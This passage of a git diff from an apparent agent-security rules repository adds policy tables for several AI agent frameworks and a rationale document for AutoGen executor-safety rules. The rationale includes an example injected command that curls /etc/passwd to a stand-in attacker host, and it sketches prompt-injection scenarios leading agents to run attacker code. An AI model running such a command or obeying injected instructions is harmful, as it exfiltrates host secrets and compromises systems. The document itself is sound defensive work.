LC-006 | LangChain | tool | langchain_tool | LangChain tool returns its output directly, bypassing the model | medium | 0.80 | 32.0 | [langchain/tool_behavior.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/tool_behavior.yaml) | +| 109 | LC-010 | LangChain | tool | langchain_tool | TypeScript LangChain tool has no description | low | 0.80 | 12.0 | [langchain/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/tool_definition.yaml) | +| 110 | LC-011 | LangChain | tool | langchain_tool | TypeScript LangChain tool body spawns a subprocess | high | 0.85 | 59.5 | [langchain/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/shell_safety.yaml) | +| 111 | LC-012 | LangChain | tool | langchain_tool | TypeScript LangChain tool evaluates dynamic code | high | 0.85 | 59.5 | [langchain/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/code_execution.yaml) | +| 112 | LC-013 | LangChain | tool | langchain_tool | TypeScript LangChain tool fetches a caller-controlled URL (SSRF) | high | 0.80 | 56.0 | [langchain/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/ssrf.yaml) | +| 113 | LC-014 | LangChain | tool | langchain_tool | TypeScript LangChain tool returns its output directly, bypassing the model | medium | 0.80 | 32.0 | [langchain/tool_behavior.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/tool_behavior.yaml) | +| 114 | LC-101 | LangChain | agent | langchain_agent, langchain_agent_executor | LangChain agent wires a code-execution or shell built-in tool | high | 0.85 | 59.5 | [langchain/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/agent_safety.yaml) | +| 115 | LC-102 | LangChain | agent | langchain_agent_executor | LangChain AgentExecutor has no max_iterations limit | medium | 0.80 | 32.0 | [langchain/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/agent_safety.yaml) | +| 116 | LC-111 | LangChain | agent | langchain_agent_executor | TypeScript LangChain AgentExecutor has no maxIterations limit | medium | 0.80 | 32.0 | [langchain/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/agent_safety.yaml) | +| 117 | LC-201 | LangChain | repo | langchain | LangChain project ships no agent-guidance doc (AGENTS.md/CLAUDE.md) | low | 0.90 | 13.5 | [langchain/repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/repo_hygiene.yaml) | +| 118 | CREW-001 | CrewAI | tool | crewai_tool | CrewAI tool has no description | low | 0.90 | 13.5 | [crewai/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/tool_definition.yaml) | +| 119 | CREW-002 | CrewAI | tool | crewai_tool | CrewAI tool parameters are not type-annotated | medium | 0.85 | 34.0 | [crewai/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/tool_definition.yaml) | +| 120 | CREW-003 | CrewAI | tool | crewai_tool | CrewAI tool body evaluates dynamic code | high | 0.85 | 59.5 | [crewai/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/code_execution.yaml) | +| 121 | CREW-004 | CrewAI | tool | crewai_tool | CrewAI tool body spawns a subprocess | high | 0.85 | 59.5 | [crewai/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/shell_safety.yaml) | +| 122 | CREW-005 | CrewAI | tool | crewai_tool | CrewAI tool fetches a caller-controlled URL (SSRF) | high | 0.80 | 56.0 | [crewai/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/ssrf.yaml) | +| 123 | CREW-006 | CrewAI | tool | crewai_tool | Mutating CrewAI tool has no idempotency key | medium | 0.55 | 22.0 | [crewai/idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/idempotency.yaml) | +| 124 | CREW-101 | CrewAI | agent | crewai_agent | CrewAI agent enables built-in code execution | high | 0.90 | 63.0 | [crewai/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/agent_safety.yaml) | +| 125 | CREW-102 | CrewAI | agent | crewai_agent | CrewAI agent runs code execution in unsafe mode | high | 0.90 | 63.0 | [crewai/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/agent_safety.yaml) | +| 126 | CREW-103 | CrewAI | agent | crewai_agent | CrewAI agent wires the code-interpreter built-in tool | high | 0.85 | 59.5 | [crewai/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/code_execution.yaml) | +| 127 | CREW-104 | CrewAI | agent | crewai_agent | CrewAI agent allows delegation to peer agents | medium | 0.75 | 30.0 | [crewai/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/agent_safety.yaml) | +| 128 | CREW-106 | CrewAI | agent | crewai_agent | CrewAI agent grants an unconstrained FileReadTool | high | 0.70 | 49.0 | [crewai/dangerous_tools.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/dangerous_tools.yaml) | +| 129 | CREW-107 | CrewAI | agent | crewai_agent | CrewAI agent wires a tool that fetches model-chosen URLs | medium | 0.70 | 28.0 | [crewai/dangerous_tools.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/dangerous_tools.yaml) | +| 130 | CREW-108 | CrewAI | tool | crewai_tool | CrewAI tool returns its output as the final answer | medium | 0.60 | 24.0 | [crewai/tool_behavior.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/tool_behavior.yaml) | +| 131 | CREW-201 | CrewAI | repo | crewai | CrewAI project ships no agent-guidance doc (AGENTS.md/CLAUDE.md) | low | 0.90 | 13.5 | [crewai/repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/repo_hygiene.yaml) | +| 132 | AG2-001 | AutoGen | agent | autogen_conversable_agent, autogen_user_proxy_agent | AutoGen executor runs code on the host without Docker | high | 0.90 | 63.0 | [autogen/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/agent_safety.yaml) | +| 133 | AG2-002 | AutoGen | agent | autogen_conversable_agent, autogen_user_proxy_agent | AutoGen executor runs code with no human review (human_input_mode=NEVER) | high | 0.85 | 59.5 | [autogen/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/agent_safety.yaml) | +| 134 | AG2-004 | AutoGen | agent | autogen_group_chat_manager | AutoGen GroupChatManager has no max_round bound | medium | 0.80 | 32.0 | [autogen/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/agent_safety.yaml) | +| 135 | AG2-005 | AutoGen | agent | autogen_assistant_agent | AutoGen AssistantAgent enables code execution on the LLM agent | medium | 0.70 | 28.0 | [autogen/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/agent_safety.yaml) | +| 136 | AG2-006 | AutoGen | agent | autogen_conversable_agent, autogen_user_proxy_agent | AutoGen executor with code execution has no auto-reply cap | medium | 0.70 | 28.0 | [autogen/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/agent_safety.yaml) | +| 137 | AG2-007 | AutoGen | tool | autogen_tool | AutoGen tool has no description | low | 0.90 | 13.5 | [autogen/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/tool_definition.yaml) | +| 138 | AG2-008 | AutoGen | tool | autogen_tool | AutoGen tool parameters are not type-annotated | medium | 0.85 | 34.0 | [autogen/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/tool_definition.yaml) | +| 139 | AG2-009 | AutoGen | tool | autogen_tool | AutoGen tool body spawns a subprocess | high | 0.85 | 59.5 | [autogen/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/shell_safety.yaml) | +| 140 | AG2-010 | AutoGen | tool | autogen_tool | AutoGen tool body evaluates dynamic code | high | 0.85 | 59.5 | [autogen/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/code_execution.yaml) | +| 141 | AG2-011 | AutoGen | tool | autogen_tool | AutoGen tool fetches a caller-controlled URL (SSRF) | high | 0.80 | 56.0 | [autogen/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/ssrf.yaml) | +| 142 | AG2-012 | AutoGen | tool | autogen_tool | AutoGen tool network call has no timeout | medium | 0.80 | 32.0 | [autogen/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/network.yaml) | +| 143 | AG2-201 | AutoGen | repo | autogen | AutoGen project ships no agent-guidance doc (AGENTS.md/CLAUDE.md) | low | 0.90 | 13.5 | [autogen/repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/repo_hygiene.yaml) | +| 144 | VAI-001 | Vercel AI | tool | vercel_ai_tool | Vercel AI tool execute() spawns a subprocess | high | 0.85 | 59.5 | [vercel_ai/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/vercel_ai/shell_safety.yaml) | +| 145 | VAI-002 | Vercel AI | tool | vercel_ai_tool | Vercel AI tool execute() evaluates code (eval / new Function) | high | 0.90 | 63.0 | [vercel_ai/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/vercel_ai/code_execution.yaml) | +| 146 | VAI-003 | Vercel AI | tool | vercel_ai_tool | Vercel AI tool execute() fetches a model-controlled URL | high | 0.75 | 52.5 | [vercel_ai/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/vercel_ai/ssrf.yaml) | +| 147 | VAI-004 | Vercel AI | tool | vercel_ai_tool | Vercel AI tool has no description | low | 0.90 | 13.5 | [vercel_ai/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/vercel_ai/tool_definition.yaml) | +| 148 | VAI-005 | Vercel AI | tool | vercel_ai_tool | Vercel AI tool accepts untyped input | medium | 0.80 | 32.0 | [vercel_ai/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/vercel_ai/tool_definition.yaml) | +| 149 | VAI-006 | Vercel AI | agent | vercel_ai_agent | Vercel AI agent wires a provider shell / computer / code-execution tool | high | 0.85 | 59.5 | [vercel_ai/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/vercel_ai/agent_safety.yaml) | +| 150 | VAI-007 | Vercel AI | agent | vercel_ai_agent | Vercel AI agent tool loop has no step bound | medium | 0.60 | 24.0 | [vercel_ai/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/vercel_ai/agent_safety.yaml) | +| 151 | VAI-008 | Vercel AI | agent | vercel_ai_agent | Vercel AI agent forces a provider execution tool every step | medium | 0.65 | 26.0 | [vercel_ai/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/vercel_ai/agent_safety.yaml) | +| 152 | VAI-012 | Vercel AI | repo | vercel_ai | Vercel AI project ships no agent-guidance doc (AGENTS.md/CLAUDE.md) | low | 0.90 | 13.5 | [vercel_ai/repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/vercel_ai/repo_hygiene.yaml) | +| 153 | PYD-001 | Pydantic AI | tool | pydantic_ai_tool | Pydantic AI tool has no description | low | 0.90 | 13.5 | [pydantic_ai/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/tool_definition.yaml) | +| 154 | PYD-002 | Pydantic AI | tool | pydantic_ai_tool | Pydantic AI tool parameters are not type-annotated | medium | 0.85 | 34.0 | [pydantic_ai/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/tool_definition.yaml) | +| 155 | PYD-003 | Pydantic AI | tool | pydantic_ai_tool | Pydantic AI tool body spawns a subprocess | high | 0.85 | 59.5 | [pydantic_ai/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/shell_safety.yaml) | +| 156 | PYD-004 | Pydantic AI | tool | pydantic_ai_tool | Pydantic AI tool body evaluates dynamic code | high | 0.85 | 59.5 | [pydantic_ai/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/code_execution.yaml) | +| 157 | PYD-005 | Pydantic AI | tool | pydantic_ai_tool | Pydantic AI tool fetches a caller-controlled URL (SSRF) | high | 0.80 | 56.0 | [pydantic_ai/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/ssrf.yaml) | +| 158 | PYD-006 | Pydantic AI | tool | pydantic_ai_tool | Pydantic AI tool network call has no timeout | high | 0.85 | 59.5 | [pydantic_ai/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/network.yaml) | +| 159 | PYD-007 | Pydantic AI | tool | pydantic_ai_tool | Mutating Pydantic AI tool has no idempotency key | medium | 0.55 | 22.0 | [pydantic_ai/idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/idempotency.yaml) | +| 160 | PYD-101 | Pydantic AI | agent | pydantic_ai_agent | Pydantic AI agent has no structured output validation | low | 0.70 | 10.5 | [pydantic_ai/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/agent_safety.yaml) | +| 161 | PYD-102 | Pydantic AI | agent | pydantic_ai_agent | Pydantic AI agent wires the code-execution native tool | high | 0.85 | 59.5 | [pydantic_ai/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/agent_safety.yaml) | +| 162 | PYD-103 | Pydantic AI | agent | pydantic_ai_agent | Pydantic AI agent wires a model-driven URL-fetching native tool | medium | 0.75 | 30.0 | [pydantic_ai/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/agent_safety.yaml) | +| 163 | PYD-105 | Pydantic AI | agent | pydantic_ai_agent | Pydantic AI agent retries with the exhaustive end strategy | low | 0.70 | 10.5 | [pydantic_ai/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/agent_safety.yaml) | +| 164 | PYD-201 | Pydantic AI | repo | pydantic_ai | Pydantic AI project ships no agent-guidance doc (AGENTS.md/CLAUDE.md) | low | 0.90 | 13.5 | [pydantic_ai/repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/repo_hygiene.yaml) | diff --git a/autogen/POLICY_INDEX.md b/autogen/POLICY_INDEX.md new file mode 100644 index 0000000..582b33e --- /dev/null +++ b/autogen/POLICY_INDEX.md @@ -0,0 +1,21 @@ + +# AutoGen / AG2 policy index + +12 rules — 6 tool · 5 agent · 1 repo + +Risk score = `severity_weight × confidence × 100` (engine formula; weights: low=0.15, medium=0.40, high=0.70). Higher = worse. + +| | Id | SDK/ADK | Scope | Applies To | Policy | Severity | Confidence | Risk | Source | +| -- | ------- | ------- | ----- | --------------------------------------------------- | ------------------------------------------------------------------------ | -------- | ---------- | ---- | --------------------------------------------------------------------------------------------------------- | +| 1 | AG2-001 | AutoGen | agent | autogen_conversable_agent, autogen_user_proxy_agent | AutoGen executor runs code on the host without Docker | high | 0.90 | 63.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/agent_safety.yaml) | +| 2 | AG2-002 | AutoGen | agent | autogen_conversable_agent, autogen_user_proxy_agent | AutoGen executor runs code with no human review (human_input_mode=NEVER) | high | 0.85 | 59.5 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/agent_safety.yaml) | +| 3 | AG2-004 | AutoGen | agent | autogen_group_chat_manager | AutoGen GroupChatManager has no max_round bound | medium | 0.80 | 32.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/agent_safety.yaml) | +| 4 | AG2-005 | AutoGen | agent | autogen_assistant_agent | AutoGen AssistantAgent enables code execution on the LLM agent | medium | 0.70 | 28.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/agent_safety.yaml) | +| 5 | AG2-006 | AutoGen | agent | autogen_conversable_agent, autogen_user_proxy_agent | AutoGen executor with code execution has no auto-reply cap | medium | 0.70 | 28.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/agent_safety.yaml) | +| 6 | AG2-007 | AutoGen | tool | autogen_tool | AutoGen tool has no description | low | 0.90 | 13.5 | [tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/tool_definition.yaml) | +| 7 | AG2-008 | AutoGen | tool | autogen_tool | AutoGen tool parameters are not type-annotated | medium | 0.85 | 34.0 | [tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/tool_definition.yaml) | +| 8 | AG2-009 | AutoGen | tool | autogen_tool | AutoGen tool body spawns a subprocess | high | 0.85 | 59.5 | [shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/shell_safety.yaml) | +| 9 | AG2-010 | AutoGen | tool | autogen_tool | AutoGen tool body evaluates dynamic code | high | 0.85 | 59.5 | [code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/code_execution.yaml) | +| 10 | AG2-011 | AutoGen | tool | autogen_tool | AutoGen tool fetches a caller-controlled URL (SSRF) | high | 0.80 | 56.0 | [ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/ssrf.yaml) | +| 11 | AG2-012 | AutoGen | tool | autogen_tool | AutoGen tool network call has no timeout | medium | 0.80 | 32.0 | [network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/network.yaml) | +| 12 | AG2-201 | AutoGen | repo | autogen | AutoGen project ships no agent-guidance doc (AGENTS.md/CLAUDE.md) | low | 0.90 | 13.5 | [repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/repo_hygiene.yaml) | diff --git a/crewai/POLICY_INDEX.md b/crewai/POLICY_INDEX.md new file mode 100644 index 0000000..a4d8b69 --- /dev/null +++ b/crewai/POLICY_INDEX.md @@ -0,0 +1,23 @@ + +# CrewAI policy index + +14 rules — 7 tool · 6 agent · 1 repo + +Risk score = `severity_weight × confidence × 100` (engine formula; weights: low=0.15, medium=0.40, high=0.70). Higher = worse. + +| | Id | SDK/ADK | Scope | Applies To | Policy | Severity | Confidence | Risk | Source | +| -- | -------- | ------- | ----- | ------------ | ---------------------------------------------------------------- | -------- | ---------- | ---- | -------------------------------------------------------------------------------------------------------- | +| 1 | CREW-001 | CrewAI | tool | crewai_tool | CrewAI tool has no description | low | 0.90 | 13.5 | [tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/tool_definition.yaml) | +| 2 | CREW-002 | CrewAI | tool | crewai_tool | CrewAI tool parameters are not type-annotated | medium | 0.85 | 34.0 | [tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/tool_definition.yaml) | +| 3 | CREW-003 | CrewAI | tool | crewai_tool | CrewAI tool body evaluates dynamic code | high | 0.85 | 59.5 | [code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/code_execution.yaml) | +| 4 | CREW-004 | CrewAI | tool | crewai_tool | CrewAI tool body spawns a subprocess | high | 0.85 | 59.5 | [shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/shell_safety.yaml) | +| 5 | CREW-005 | CrewAI | tool | crewai_tool | CrewAI tool fetches a caller-controlled URL (SSRF) | high | 0.80 | 56.0 | [ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/ssrf.yaml) | +| 6 | CREW-006 | CrewAI | tool | crewai_tool | Mutating CrewAI tool has no idempotency key | medium | 0.55 | 22.0 | [idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/idempotency.yaml) | +| 7 | CREW-101 | CrewAI | agent | crewai_agent | CrewAI agent enables built-in code execution | high | 0.90 | 63.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/agent_safety.yaml) | +| 8 | CREW-102 | CrewAI | agent | crewai_agent | CrewAI agent runs code execution in unsafe mode | high | 0.90 | 63.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/agent_safety.yaml) | +| 9 | CREW-103 | CrewAI | agent | crewai_agent | CrewAI agent wires the code-interpreter built-in tool | high | 0.85 | 59.5 | [code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/code_execution.yaml) | +| 10 | CREW-104 | CrewAI | agent | crewai_agent | CrewAI agent allows delegation to peer agents | medium | 0.75 | 30.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/agent_safety.yaml) | +| 11 | CREW-106 | CrewAI | agent | crewai_agent | CrewAI agent grants an unconstrained FileReadTool | high | 0.70 | 49.0 | [dangerous_tools.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/dangerous_tools.yaml) | +| 12 | CREW-107 | CrewAI | agent | crewai_agent | CrewAI agent wires a tool that fetches model-chosen URLs | medium | 0.70 | 28.0 | [dangerous_tools.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/dangerous_tools.yaml) | +| 13 | CREW-108 | CrewAI | tool | crewai_tool | CrewAI tool returns its output as the final answer | medium | 0.60 | 24.0 | [tool_behavior.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/tool_behavior.yaml) | +| 14 | CREW-201 | CrewAI | repo | crewai | CrewAI project ships no agent-guidance doc (AGENTS.md/CLAUDE.md) | low | 0.90 | 13.5 | [repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/repo_hygiene.yaml) | diff --git a/docs/Policy/autogen/agent_safety.md b/docs/Policy/autogen/agent_safety.md new file mode 100644 index 0000000..4453fa8 --- /dev/null +++ b/docs/Policy/autogen/agent_safety.md @@ -0,0 +1,248 @@ +--- +policy_id: autogen_agent_safety +category: autogen +topic: agent_safety +rules: + - id: AG2-001 + severity: high + confidence: 0.9 + scope: agent + fix_type: config + - id: AG2-002 + severity: high + confidence: 0.85 + scope: agent + fix_type: config + - id: AG2-004 + severity: medium + confidence: 0.8 + scope: agent + fix_type: config + - id: AG2-005 + severity: medium + confidence: 0.7 + scope: agent + fix_type: config + - id: AG2-006 + severity: medium + confidence: 0.7 + scope: agent + fix_type: config +references: [LLM05, LLM06, LLM10] +--- + +# Policy Rationale: AutoGen Agent Safety + +**Policy ID:** `autogen_agent_safety` +**File:** `autogen/agent_safety.yaml` +**Rules:** AG2-001, AG2-002, AG2-004, AG2-005, AG2-006 +**Severities:** high, high, medium, medium, medium +**Fix types:** config, config, config, config, config +**References:** LLM05 (Improper Output Handling), LLM06 (Excessive Agency), LLM10 (Unbounded Consumption) + +--- + +## What this policy covers + +Agent-scope rules for AutoGen / AG2 agents, read off the constructor kwargs of +`ConversableAgent`, `UserProxyAgent`, `AssistantAgent`, and `GroupChatManager`. +They flag the configurations AutoGen's own docs warn against: code execution on +the host with no Docker (AG2-001), code execution with no human review +(AG2-002), an unbounded group-chat loop (AG2-004), code execution enabled on the +LLM-facing assistant (AG2-005), and a code-executing agent with no auto-reply cap +(AG2-006). Each uses the `agent_kwarg_value` / `agent_kwarg_present` / +`agent_kwarg_missing` predicates against the constructor call. + +--- + +## Why executor configuration is a distinct concern in AutoGen + +AutoGen's design splits two responsibilities: an LLM agent *generates* code, and +a separate executor agent *runs* it. The danger lives in how the executor is +configured, because every code block the model emits flows into it. AutoGen's +documentation is explicit — "we strongly recommend Docker" and "local execution +is not recommended" — and these rules flag the exact settings that defeat that +guidance. With `use_docker=False` (AG2-001), generated code is written to disk and +executed directly on the host with the agent process's privileges; because the +conversation, tool outputs, and retrieved content are all model-reachable, a +single prompt injection becomes host remote code execution with no container to +contain it. `human_input_mode="NEVER"` on a code-executing agent (AG2-002) +removes the last checkpoint before execution, making the agent fully autonomous — +the model's code runs with zero review. + +Two more rules guard the generate/execute boundary and the loop bounds. +Collapsing generation and execution into one `AssistantAgent` (AG2-005) means the +agent the model fully controls also runs whatever it produces, removing the review +boundary AutoGen's two-agent pattern exists to provide. And unbounded loops are an +Unbounded Consumption (LLM10) hazard with a safety edge: a `GroupChatManager` +with no `max_round` (AG2-004) lets a degenerate conversation run until something +else stops it, and a code-executing executor with no `max_consecutive_auto_reply` +(AG2-006) can auto-execute model code an unbounded number of times — so a single +injected instruction is amplified across many runs, multiplying both cost and +blast radius. + +--- + +## Rule-by-rule defense + +### AG2-001 — Executor runs code on the host without Docker (Severity: high, Confidence: 0.9, Fix type: config) + +**What we detect:** a `ConversableAgent` / `UserProxyAgent` with +`code_execution_config={"use_docker": False}` (predicate `agent_kwarg_value` on +`code_execution_config.use_docker`). + +**Why it is flaggable:** with Docker disabled, model-generated code runs directly +on the host — no container, no isolation. A prompt injection becomes host RCE, +the exact scenario AutoGen's "strongly recommend Docker" guidance addresses. + +**Real-world consequence:** an executor with `use_docker=False` receives an +injected code block that runs `os.system("curl attacker/$(cat /etc/passwd)")` on +the host with the service account's privileges. + +**Why severity is high and not critical:** the engine reserves critical for +exposures with no precondition; here the agent must both have code execution +enabled and be reachable by model-influenced input, and the fix is a single +config flip — high reflects a serious, conditional RCE path. **Fix type — +config:** set `use_docker=True` or disable execution, a constructor change. +**Confidence 0.9:** the literal-value match is unambiguous; the small gap covers +an executor whose input is provably never untrusted. + +### AG2-002 — Executor runs code with no human review (Severity: high, Confidence: 0.85, Fix type: config) + +**What we detect:** an agent with `human_input_mode="NEVER"` AND a +`code_execution_config` present (predicates `agent_kwarg_value` + +`agent_kwarg_present`). + +**Why it is flaggable:** the combination makes a code-executing agent fully +autonomous — every emitted code block runs with no human in the loop, so an +injection executes attacker code with no chance to intervene. + +**Real-world consequence:** an unattended pipeline runs a code-executing executor +with `human_input_mode="NEVER"`; an injected instruction in a fetched document is +executed without any approval prompt. + +**Why severity is high and not critical:** like AG2-001 it requires code +execution to be enabled and reachable; high, not critical, because the precondition +exists and the executor may still run in Docker (limiting the blast radius to the +container). **Fix type — config:** set `human_input_mode` to `ALWAYS`/`TERMINATE` +or disable execution. **Confidence 0.85:** the rule confirms execution is +configured and review is off, but cannot see an out-of-band approval gate the team +may have wired around the agent — a small over-flag. + +### AG2-004 — GroupChatManager has no max_round bound (Severity: medium, Confidence: 0.8, Fix type: config) + +**What we detect:** a `GroupChatManager` (or `GroupChat`) with no `max_round` +kwarg (predicate `agent_kwarg_missing`). + +**Why it is flaggable:** with no round cap the speaker-selection loop has no +upper bound; a degenerate conversation runs until the budget or wall-clock is +exhausted (LLM10), and if participants hold side-effecting tools the same +mutation can be applied repeatedly. + +**Real-world consequence:** two agents keep handing a task back and forth because +neither emits the termination signal; the chat burns API budget for hundreds of +rounds before a timeout kills it. + +**Why severity is medium and not high:** the usual outcome is a cost/availability +incident rather than a direct compromise — serious but recoverable, and only a +safety problem when looped tools have side effects. **Fix type — config:** pass +`max_round=`. **Confidence 0.8:** a chat wrapped by an external timeout or a +custom loop guard is over-flagged, since the rule sees only the constructor +kwarg. + +### AG2-005 — AssistantAgent enables code execution on the LLM agent (Severity: medium, Confidence: 0.7, Fix type: config) + +**What we detect:** an `AssistantAgent` with a `code_execution_config` present +(predicate `agent_kwarg_present`). + +**Why it is flaggable:** AutoGen's recommended pattern keeps the +`AssistantAgent` at `code_execution_config=False` and routes execution through a +separate `UserProxyAgent`. Enabling execution on the assistant collapses the +generate/execute boundary, so the model-controlled agent also runs its own +output. + +**Real-world consequence:** an `AssistantAgent` configured to both generate and +execute is prompt-injected; the injected code runs in the same agent with no +executor review step between generation and execution. + +**Why severity is medium and not high:** it is a defense-in-depth/architecture +finding — the assistant's executor may still be Dockered and the risk depends on +that executor's own settings (which AG2-001/002 cover) — so removing the boundary +is a weakening rather than a direct RCE grant. **Fix type — config:** set the +assistant's `code_execution_config=False` and use a dedicated executor. +**Confidence 0.7:** presence of `code_execution_config` does not by itself prove +the execution is unsafe (it may point at a hardened Docker executor), so the rule +over-flags safe two-role setups that happen to set the kwarg on the assistant. + +### AG2-006 — Code-executing executor has no auto-reply cap (Severity: medium, Confidence: 0.7, Fix type: config) + +**What we detect:** a `ConversableAgent` / `UserProxyAgent` with a +`code_execution_config` present AND no `max_consecutive_auto_reply` kwarg +(predicates `agent_kwarg_present` + `agent_kwarg_missing`). + +**Why it is flaggable:** with no auto-reply cap a code-executing agent can +auto-respond — and therefore auto-execute model code — an unbounded number of +times in one exchange, amplifying the cost and blast radius of a single injected +instruction. + +**Real-world consequence:** an executor with no `max_consecutive_auto_reply` +loops on a failing code block, re-executing slightly varied attacker code dozens +of times before anything stops it. + +**Why severity is medium and not high:** it is an amplifier of the underlying +code-execution risk (covered by AG2-001/002), not a fresh RCE path on its own; +its impact is the unbounded *repetition* rather than the execution itself. **Fix +type — config:** set `max_consecutive_auto_reply=` to a small integer. +**Confidence 0.7:** a deployment that bounds the loop another way (an external +turn limit, a custom reply handler) is over-flagged, since the rule sees only the +constructor. + +--- + +## What this policy does not cover + +- Code execution wired by hand inside a tool body rather than via an executor — + caught by **AG2-010** (code_execution.md), not here. +- Whether the agent's input is actually reachable by untrusted content. All five + rules flag a configuration, not a proven injection path. +- AG2-005 cannot tell whether the assistant's configured executor is itself + hardened (Docker, human review) — it flags the boundary collapse regardless. +- Loop bounds enforced outside the constructor (an external timeout, a custom + speaker-selection or reply handler) are invisible to AG2-004 / AG2-006. +- The newer `autogen-agentchat` (v0.4+) API surface and its + `CodeExecutorAgent` / executor classes are matched only insofar as discovery + normalizes them to these agent kinds; configs expressed through a different + shape may be missed. + +--- + +## Recommendations beyond the fix + +```python +from autogen import AssistantAgent, UserProxyAgent + +# AutoGen's recommended split: the assistant only generates; a Dockered, +# human-gated, bounded executor runs the code. +assistant = AssistantAgent( + name="coder", + llm_config={...}, + code_execution_config=False, # generation only +) + +executor = UserProxyAgent( + name="executor", + human_input_mode="ALWAYS", # a human approves each run + max_consecutive_auto_reply=3, # bounded auto-reply loop + code_execution_config={"use_docker": True, "work_dir": "sandbox"}, +) +``` + +1. Keep generation and execution in separate agents; never set + `code_execution_config` on the `AssistantAgent`. +2. Run all generated code in Docker 